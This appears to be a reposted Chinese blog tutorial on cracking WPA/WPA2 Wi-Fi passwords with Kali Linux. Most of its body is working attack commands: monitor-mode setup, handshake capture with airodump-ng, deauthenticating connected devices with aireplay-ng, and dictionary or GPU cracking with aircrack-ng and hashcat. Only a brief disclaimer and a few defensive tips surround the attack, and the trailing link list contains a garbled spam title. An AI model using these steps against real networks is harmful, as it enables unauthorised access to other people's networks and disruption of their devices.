Kali Linux使用Aircrack破解wifi密码(wpa/wpa2)

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Kali Linux使用Aircrack破解wifi密码(wpa/wpa2)相关的知识,希望对你有一定的参考价值。


Kali Linux使用Aircrack破解wifi密码(wpa/wpa2)

要求:

安装有KaliLinux的计算机 支持监控模式的网卡,笔记本电脑一般都支持 字典文件 时间和耐心

这种攻击需要字典文件,一个好的字典至关重要。我以Kali Linux自带的rockyou字典为例,位于/user/share/wordlists/rockyou.txt.gz。

使用前先解压:

 

# gzip -d /usr/share/wordlists/rockyou.txt.gz

 

注意:破解其他人的wifi密码是“犯罪”,so,don’t;我使用自己的无线路由器演示。

知道了攻击方法,你自然就知道怎么防范了。

1)首先断开连接的wifi。

在终端中执行:

 

# airmon-ng

 

技术分享

上面命令列出了支持监控模式的无线网卡。如果没有任何输出,表示无线网卡不支持监控模式。你可以看到我的wlan0支持监控模式。

2)开启无线网卡的监控模式

 

# airmon-ng start wlan0

 

技术分享

执行成功之后网卡接口变为wlan0mon;可以使用ifconfig命令查看。

3)查看wifi网络

 

# airodump-ng wlan0mon

 

技术分享

上面列出了周围的wifi和它们的详细信息,包括信号强度、加密类型、频道等。要记住要破解wifi的频道号和BSSID。

按Ctrl-C结束。

4)抓取握手包

使用网卡的监听模式抓取周围的无线网络数据包。其中,对我们最重要的数据包是:包含密码的包-也叫握手包。当有新用户或断开用户自动连接wifi时,会发送握手包。

开始抓包:

 

# airodump-ng -c 6 --bssid C8:3A:35:30:3E:C8 -w ~/wlan0mon

 

参数解释:

-c指定频道号 –bssid指定路由器bssid -w指定抓取的数据包保存位置

技术分享

5)强制连接到wifi的设备重新连接路由器

现在我们只要等用户连接/重连接wifi了,运气不好也许要很长时间。

但是我们是不会等的,这不是耐心黑客该干的事。有一个叫aireplay-ng的工具,它可以强制用户断开wifi连接;原理是,给连接到wifi的一个设备发送一个deauth(反认证)包,让那个设备断开wifi,随后它自然会再次连接wifi。

aireplay-ng的生效前提是,wifi网络中至少有一个连接的设备。从上图(4)可以看到哪些设备连接到了wifi,STATION就是连接设备的MAC地址,记住一个。

打开新终端执行:

 

# aireplay-ng -0 2 -a C8:3A:35:30:3E:C8 -cB8:E8:56:09:CC:9C wlan0mon

 

参数解释:

-0指定发送反认证包的个数 -a指定无线路由器BSSID -c指定强制断开的设备

技术分享

如果成功:

技术分享

按Ctrl-C结束抓包。

我们已经得到了想要的握手包了,可以结束无线网卡的监控模式了:

 

# airmon-ng stop wlan0mon

 

技术分享

6) 开始破解密码

 

# aircrack-ng -a2 -b C8:3A:35:30:3E:C8 -w/usr/share/wordlists/rockyou.txt ~/*.cap

 

参数解释:

-a2代表WPA的握手包 -b指定要破解的wifi BSSID。-w指定字典文件 最后是抓取的包

技术分享

可选)使用显卡的运算能力

如果你有一个强大的GPU,为什么不使用GPU跑字典呢?

 

Hashcat可以借助GPU的运算力破解各种不同算法的hash值。

 

下载时要注意选择正确的显卡类型(AMD、NVidia)。

在破解cap文件之前,要把它转换为hccap文件:

 

# aircrack-ng file.cap -J out.hccap

 

使用GPU破解hash:

 

# oclHashcat.bin -m 2500 out.hccap 字典文件

 

总结:防止这种攻击最简单的方法是设置贼复杂贼长的密码;

不要使用WEP加密方式,非常容易被破解:

Kali Linux破解wifi密码(WEP)

现在的无线路由器都有WPS功能,关了吧:

必须确保你在使用USB无线网卡,虚拟机只能挂载USB无线网卡,原理我就不解释 了

启动虚拟机,在kali linux中打开终端,输入

airmon-ng

一般情况下没有任何信息,如下图:

技术分享

找不到网卡,是没有办法抓包的,下面就VMWare和VirtualBox中如何加载USB无线网卡做简要的说明。

1.1 VMWare下的配置

打开VMWare,在标签页中找到虚拟机(VM),在可移动设备下找到USB 无线网卡,然后选择连接。

技术分享

注意,将无线网卡连接到虚拟机,会在本机断开无线网络连接。

之后在虚拟机的右下方找到usb设备,右键,选择连接。

技术分享

现在检查是否网卡挂接成功,再次输入airmon-ng命令,结果如下:

技术分享

配置成功。

1.2 VirtualBox下的配置

在启动Kali Linux之前,打开虚拟机设置,选择usb设备。

技术分享

点击添加设备按钮:

技术分享

在设备列表中选择你的USB无线网卡。

技术分享

技术分享

在网络配置界面,勾选掉启用网络连接。

技术分享

启动虚拟机。

在终端输入airmon-ng,可以看到加载的网卡:

技术分享

同时可以在虚拟机中查找并连接无线网络了。

技术分享

 


本文出自 “柠檬琉璃夏” 博客,谢绝转载!

以上是关于Kali Linux使用Aircrack破解wifi密码(wpa/wpa2)的主要内容,如果未能解决你的问题,请参考以下文章

Kali系统使用Aircrack-ng进行暴力破解WIFI密码

用kali linux抓取wifi握手包并暴力破解

Kali Linux WiFi密码破解

Kali之aircrack-ng

kali linux里的aircrack-ng怎么用

如何用python轻松破解wif梦幻西游无双开服公告i密码